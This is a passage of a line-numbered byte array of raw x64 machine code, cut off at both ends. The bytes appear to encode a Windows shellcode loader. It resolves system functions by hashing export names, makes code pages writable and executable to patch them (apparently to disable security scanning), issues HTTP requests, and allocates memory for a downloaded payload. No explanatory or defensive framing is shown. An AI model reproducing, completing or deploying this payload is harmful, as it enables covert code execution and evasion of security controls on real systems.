8 0x8d, 0x05, 0x26, 0x11, 0x00, 0x00, 0x21, 0x7c, 0x24, 0x20, 0x4c, 0x8b,
9 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b, 0x43, 0x28, 0x48,
10 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xf8,
11 0xe8, 0x83, 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb,
12 0x48, 0x8b, 0x93, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xe8, 0xe8, 0x6d,
13 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b,
14 0x93, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8, 0x57, 0x23, 0x00,
15 0x00, 0x48, 0x85, 0xed, 0x74, 0x4c, 0x48, 0x85, 0xf6, 0x74, 0x47, 0x48,
16 0x85, 0xc0, 0x74, 0x42, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00, 0x10, 0x00,
17 0xff, 0xd0, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30, 0xff, 0xd6,
18 0x48, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x30,
19 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x33, 0xd2, 0x48,
20 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0xff, 0xd5, 0xeb, 0x0b, 0x48,
21 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x86, 0x10, 0x00, 0x00, 0x48, 0x8b,
22 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05, 0x00, 0x00, 0x49, 0x8b, 0x5b,
23 0x10, 0x49, 0x8b, 0x6b, 0x18, 0x49, 0x8b, 0x73, 0x20, 0x49, 0x8b, 0xe3,
24 0x5f, 0xc3, 0xcc, 0xcc, 0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3,
25 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0x4d, 0x85, 0xc0, 0x75,
26 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b, 0x49, 0x10, 0x49,
27 0x8b, 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x49,
28 0x8b, 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
29 0x49, 0x8b, 0x81, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x17,
30 0x49, 0x8b, 0x81, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
31 0x0a, 0x49, 0x89, 0x08, 0xf0, 0xff, 0x41, 0x08, 0x33, 0xc0, 0xc3, 0x49,
32 0x83, 0x20, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc,
33 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x08, 0xff, 0xc8, 0xc3, 0xcc,
34 0x33, 0xc0, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c,
35 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20,
36 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xe8, 0x48, 0x8b, 0xf1, 0x41, 0xf6, 0xc0,
37 0x02, 0x74, 0x1b, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x85, 0xdb, 0x74,
38 0x1c, 0x48, 0x8b, 0x49, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48,
39 0x8b, 0x46, 0x38, 0x48, 0x89, 0x03, 0x40, 0xf6, 0xc5, 0x01, 0x74, 0x1c,
40 0x48, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x12,
41 0x48, 0x8d, 0x5e, 0x28, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcb, 0xff, 0x50,
42 0x08, 0x48, 0x89, 0x1f, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48,
43 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83, 0xc4,
44 0x20, 0x5f, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
45 0x41, 0x58, 0x48, 0x8b, 0xda, 0xff, 0x50, 0x78, 0x89, 0x03, 0x33, 0xc0,
46 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53,
47 0x48, 0x83, 0xec, 0x60, 0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8,
48 0x83, 0x60, 0x18, 0x00, 0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33,
49 0xd2, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2a, 0x27, 0x00, 0x00, 0x48, 0x8b,
50 0x03, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18,
51 0x85, 0xc0, 0x75, 0x1e, 0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78,
52 0x4c, 0x8d, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48,
53 0x8d, 0x94, 0x24, 0x88, 0x00, 0x00, 0x00, 0xff, 0x50, 0x20, 0x33, 0xc0,
54 0x48, 0x83, 0xc4, 0x60, 0x5b, 0xc3, 0xcc, 0xcc, 0x4d, 0x8b, 0xc8, 0x4d,
55 0x85, 0xc0, 0x75, 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b,
56 0x41, 0x58, 0x49, 0x8b, 0x80, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02,
57 0x75, 0x0d, 0x49, 0x8b, 0x80, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42,
58 0x08, 0x74, 0x19, 0x49, 0x8b, 0x80, 0xa4, 0x06, 0x00, 0x00, 0x48, 0x3b,
59 0x02, 0x75, 0x16, 0x49, 0x8b, 0x80, 0xac, 0x06, 0x00, 0x00, 0x48, 0x3b,
60 0x42, 0x08, 0x75, 0x09, 0x49, 0x89, 0x09, 0xf0, 0xff, 0x41, 0x08, 0xeb,
61 0x24, 0x49, 0x8b, 0x80, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75,
62 0x1b, 0x49, 0x8b, 0x80, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08,
63 0x75, 0x0e, 0x48, 0x8d, 0x41, 0x10, 0x49, 0x89, 0x01, 0xf0, 0xff, 0x41,
64 0x18, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00,
65 0x80, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0x44, 0x24, 0x30, 0x83, 0x20, 0x00,
66 0x33, 0xc0, 0xc3, 0xcc, 0x0f, 0xaf, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc,
67 0x48, 0x8b, 0x44, 0x24, 0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc,
68 0x8d, 0x04, 0x11, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57,
69 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xd9, 0x48,
70 0x81, 0xc1, 0x58, 0x03, 0x00, 0x00, 0xff, 0x53, 0x30, 0x48, 0x8b, 0xf0,
71 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xd7,
72 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0xc0, 0x05, 0x00, 0x00, 0x48, 0x8b,
73 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84,
74 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x99, 0xff, 0xff, 0xff, 0x4c,
75 0x8d, 0x3d, 0x86, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xff, 0x0f, 0x88, 0xa5,
76 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8,
77 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53,
78 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7,
79 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0xa1, 0x25, 0x00, 0x00, 0x44,
80 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6,
81 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d, 0x93, 0xd0, 0x05, 0x00,
82 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xf0, 0x48, 0x85,
83 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x42, 0xff, 0xff, 0xff, 0x4c, 0x8d,
84 0x35, 0x2f, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e, 0x4c, 0x8d,
85 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x8b,
86 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74, 0x25, 0x44,
87 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0x25, 0x00,
88 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x8b,
89 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x21, 0xff, 0xff, 0xff,
90 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4, 0x20, 0x41,
91 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24,
92 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20,
93 0x48, 0x8b, 0xd9, 0x48, 0x81, 0xc1, 0x64, 0x03, 0x00, 0x00, 0xff, 0x53,
94 0x30, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00,
95 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0x70, 0x05,
96 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48,
97 0x85, 0xc0, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x65,
98 0x1f, 0x00, 0x00, 0x4c, 0x8d, 0x3d, 0xf6, 0xfc, 0xff, 0xff, 0x41, 0x2b,
99 0xff, 0x0f, 0x88, 0xa5, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50,
100 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48,
101 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00,
102 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0x89,
103 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
104 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d,
105 0x93, 0x90, 0x05, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48,
106 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0xf2, 0x1e,
107 0x00, 0x00, 0x4c, 0x8d, 0x35, 0xdf, 0x1e, 0x00, 0x00, 0x41, 0x2b, 0xfe,
108 0x78, 0x3e, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40,
109 0x00, 0x00, 0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85,
110 0xc0, 0x74, 0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce,
111 0xe8, 0x27, 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
112 0x4c, 0x24, 0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9,
113 0x21, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48,
114 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc,
115 0x40, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
116 0x57, 0x48, 0x8d, 0xac, 0x24, 0x48, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec,
117 0xb8, 0x02, 0x00, 0x00, 0x83, 0xa5, 0x08, 0x02, 0x00, 0x00, 0x00, 0x48,
118 0x8b, 0xf9, 0x45, 0x33, 0xf6, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x33, 0xd2,
119 0xbe, 0x00, 0x02, 0x60, 0x84, 0x41, 0x8d, 0x5e, 0x68, 0x44, 0x8b, 0xc3,
120 0xe8, 0xdb, 0x23, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x89, 0x5c, 0x24,
121 0x40, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x8f, 0xe8, 0x06, 0x00,
122 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x33, 0xd2, 0x48, 0x89,
123 0x45, 0x88, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x01, 0x00, 0x00,
124 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0x89, 0x44, 0x24, 0x60, 0x89, 0x45,
125 0x90, 0xff, 0x97, 0xf0, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x85, 0xc0, 0x0f,
126 0x84, 0x16, 0x02, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x54, 0x04, 0xb8, 0x00,
127 0x32, 0xe0, 0x84, 0x44, 0x8b, 0xe3, 0x89, 0x5c, 0x24, 0x20, 0x41, 0x0f,
128 0x94, 0xc4, 0x0f, 0x44, 0xf0, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x33,
129 0xd2, 0x33, 0xc9, 0xff, 0x97, 0xf8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8,
130 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x01, 0x00, 0x00, 0x44, 0x0f, 0xb7,
131 0x44, 0x24, 0x64, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x89, 0x5c, 0x24, 0x38,
132 0x45, 0x33, 0xc9, 0x89, 0x5c, 0x24, 0x30, 0x48, 0x8b, 0xc8, 0xc7, 0x44,
133 0x24, 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff,
134 0x97, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f,
135 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x38, 0x48, 0x8d,
136 0x97, 0xe8, 0x07, 0x00, 0x00, 0x89, 0x74, 0x24, 0x30, 0x4c, 0x8d, 0x85,
137 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x28, 0x45, 0x33, 0xc9,
138 0x48, 0x8b, 0xc8, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff, 0x97, 0x20, 0x01,
139 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x0f, 0x01,
140 0x00, 0x00, 0x45, 0x85, 0xe4, 0x74, 0x28, 0x0f, 0xba, 0xe6, 0x0c, 0x73,
141 0x22, 0x45, 0x8d, 0x4e, 0x04, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x80,
142 0x33, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
143 0xc8, 0x41, 0x8d, 0x56, 0x1f, 0xff, 0x97, 0x08, 0x01, 0x00, 0x00, 0x45,
144 0x33, 0xe4, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x44, 0x89, 0x64, 0x24,
145 0x20, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x28, 0x01, 0x00, 0x00,
146 0x85, 0xc0, 0x0f, 0x84, 0xb8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x8d, 0x00,
147 0x02, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00,
148 0x00, 0x4c, 0x8d, 0x85, 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24,
149 0x20, 0xba, 0x13, 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30,
150 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00, 0x81,
151 0xbd, 0x08, 0x02, 0x00, 0x00, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x79, 0x48,
152 0x8d, 0xb7, 0x18, 0x09, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00,
153 0x08, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xc6, 0x4c, 0x89, 0x26, 0x4c, 0x8d,
154 0x8d, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24, 0x20, 0xba, 0x05,
155 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30, 0x01, 0x00, 0x00,
156 0x85, 0xc0, 0x74, 0x44, 0x48, 0x8b, 0x16, 0x48, 0x85, 0xd2, 0x74, 0x3c,
157 0x33, 0xc9, 0x45, 0x8d, 0x4c, 0x24, 0x04, 0x41, 0xb8, 0x00, 0x30, 0x00,
158 0x00, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x20, 0x09, 0x00, 0x00, 0x48,
159 0x85, 0xc0, 0x74, 0x20, 0x44, 0x8b, 0x06, 0x4c, 0x8d, 0x8d, 0x18, 0x02,
160 0x00, 0x00, 0x48, 0x8b, 0xd0, 0x44, 0x89, 0xa5, 0x18, 0x02, 0x00, 0x00,
161 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x10, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xf0,
162 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcf,
163 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcd, 0xff, 0x97, 0x18,
164 0x01, 0x00, 0x00, 0x45, 0x85, 0xf6, 0x74, 0x46, 0x83, 0xbf, 0x34, 0x02,
165 0x00, 0x00, 0x03, 0x75, 0x3d, 0x48, 0x8b, 0x9f, 0x20, 0x09, 0x00, 0x00,
166 0x48, 0x8d, 0x97, 0x08, 0x09, 0x00, 0x00, 0x44, 0x8b, 0x8f, 0x18, 0x09,
167 0x00, 0x00, 0x48, 0x8d, 0x8f, 0xf8, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xc3,
168 0xe8, 0xe3, 0x1d, 0x00, 0x00, 0x48, 0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f,
169 0xf0, 0x07, 0x00, 0x00, 0xe8, 0x8b, 0x1c, 0x00, 0x00, 0x48, 0x3b, 0x83,
170 0x18, 0x05, 0x00, 0x00, 0x75, 0x05, 0x41, 0x8b, 0xc6, 0xeb, 0x02, 0x33,
171 0xc0, 0x48, 0x81, 0xc4, 0xb8, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
172 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
173 0x48, 0x89, 0x5c, 0x24, 0x08, 0x4c, 0x89, 0x44, 0x24, 0x18, 0x55, 0x56,
174 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac,
175 0x24, 0xf0, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00,
176 0x4c, 0x63, 0x7a, 0x3c, 0x4d, 0x8b, 0xe9, 0x48, 0x8b, 0xda, 0x4c, 0x8b,
177 0xe1, 0x41, 0x8b, 0x84, 0x17, 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f,
178 0x84, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3c, 0x02, 0x8b, 0x77, 0x18,
179 0x85, 0xf6, 0x0f, 0x84, 0x86, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33,
180 0xc9, 0x44, 0x8b, 0x47, 0x0c, 0x48, 0x03, 0xc2, 0x48, 0x89, 0x44, 0x24,
181 0x30, 0x4c, 0x03, 0xc2, 0x8b, 0x47, 0x20, 0x48, 0x03, 0xc2, 0x48, 0x89,
182 0x85, 0x58, 0x01, 0x00, 0x00, 0x8b, 0x47, 0x24, 0x48, 0x03, 0xc2, 0x48,
183 0x89, 0x44, 0x24, 0x28, 0x41, 0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33,
184 0xd2, 0xff, 0xc1, 0x0c, 0x20, 0x88, 0x44, 0x15, 0x00, 0x8b, 0xd1, 0x42,
185 0x8a, 0x04, 0x01, 0x84, 0xc0, 0x75, 0xee, 0xc6, 0x44, 0x0d, 0x00, 0x00,
186 0x49, 0x8b, 0xd5, 0x48, 0x8d, 0x4d, 0x00, 0xe8, 0xbc, 0x1b, 0x00, 0x00,
187 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
188 0xff, 0xce, 0x49, 0x8b, 0xd5, 0x8b, 0x0c, 0xb0, 0x48, 0x03, 0xcb, 0xe8,
189 0xa0, 0x1b, 0x00, 0x00, 0x48, 0x33, 0x44, 0x24, 0x20, 0x48, 0x3b, 0x85,
190 0x60, 0x01, 0x00, 0x00, 0x74, 0x21, 0x85, 0xf6, 0x75, 0xd7, 0x33, 0xc0,
191 0x48, 0x8b, 0x9c, 0x24, 0x50, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x10,
192 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
193 0x5e, 0x5d, 0xc3, 0x48, 0x8b, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x4c, 0x24,
194 0x30, 0x0f, 0xb7, 0x04, 0x70, 0x44, 0x8b, 0x04, 0x81, 0x4c, 0x03, 0xc3,
195 0x4c, 0x3b, 0xc7, 0x0f, 0x82, 0xaf, 0x00, 0x00, 0x00, 0x41, 0x8b, 0x84,
196 0x1f, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x03, 0xc7, 0x4c, 0x3b, 0xc0, 0x0f,
197 0x83, 0x9b, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x44, 0x8b, 0xcb, 0x41, 0x38,
198 0x18, 0x74, 0x21, 0x41, 0x83, 0xf9, 0x3c, 0x73, 0x1b, 0x41, 0x8b, 0xc9,
199 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44, 0x0c, 0x40, 0x42, 0x80, 0x3c, 0x01,
200 0x2e, 0x74, 0x09, 0x41, 0xff, 0xc1, 0x43, 0x38, 0x1c, 0x01, 0x75, 0xdf,
201 0x41, 0x8d, 0x41, 0x01, 0x8b, 0xd0, 0xc6, 0x44, 0x04, 0x40, 0x64, 0x41,
202 0x8d, 0x41, 0x02, 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x03,
203 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x04, 0x4e, 0x8d, 0x0c,
204 0x02, 0x88, 0x5c, 0x04, 0x40, 0x8b, 0xd3, 0x41, 0x38, 0x19, 0x74, 0x17,
205 0x83, 0xfa, 0x7f, 0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04,
206 0x09, 0x88, 0x44, 0x0d, 0x80, 0x42, 0x38, 0x1c, 0x0a, 0x75, 0xe9, 0x8b,
207 0xc2, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x88, 0x5c, 0x05, 0x80, 0x41, 0xff,
208 0x54, 0x24, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x11, 0x48, 0x8d, 0x55, 0x80,
209 0x48, 0x8b, 0xc8, 0x41, 0xff, 0x54, 0x24, 0x38, 0x4c, 0x8b, 0xc0, 0xeb,
210 0x03, 0x4c, 0x8b, 0xc3, 0x49, 0x8b, 0xc0, 0xe9, 0x10, 0xff, 0xff, 0xff,
211 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b,
212 0xda, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
213 0x48, 0x83, 0x63, 0x30, 0x00, 0x48, 0x8b, 0x4b, 0x38, 0x48, 0x85, 0xc9,
214 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x38,
215 0x00, 0x48, 0x8b, 0x4b, 0x28, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b,
216 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x28, 0x00, 0x48, 0x8b, 0x4b,
217 0x20, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
218 0x48, 0x83, 0x63, 0x20, 0x00, 0x48, 0x8b, 0x4b, 0x18, 0x48, 0x85, 0xc9,
219 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x18,
220 0x00, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x85, 0xc9, 0x74, 0x15, 0x48, 0x8b,
221 0x01, 0xff, 0x50, 0x58, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x8b, 0x01, 0xff,
222 0x50, 0x10, 0x48, 0x83, 0x63, 0x10, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48,
223 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83,
224 0x63, 0x08, 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0x48,
225 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x23, 0x00, 0x48, 0x83, 0xc4,
226 0x20, 0x5b, 0xc3, 0xcc, 0xf0, 0xff, 0x41, 0x20, 0x8b, 0x41, 0x20, 0xc3,
227 0x48, 0x8b, 0x49, 0x10, 0x45, 0x8b, 0xd1, 0x4c, 0x8b, 0x4c, 0x24, 0x30,
228 0x49, 0x8b, 0xd0, 0x45, 0x8b, 0xc2, 0x48, 0x8b, 0x01, 0x48, 0xff, 0x60,
229 0x50, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83,
230 0xec, 0x20, 0x49, 0x8b, 0xd9, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x75,
231 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x13, 0x48, 0x8b, 0x49, 0x10,
232 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48, 0x8b, 0x47, 0x10, 0x48, 0x89,
233 0x03, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48, 0x83, 0xc4, 0x20,
234 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x85, 0xd2, 0x75, 0x06, 0xb8, 0x03, 0x40,
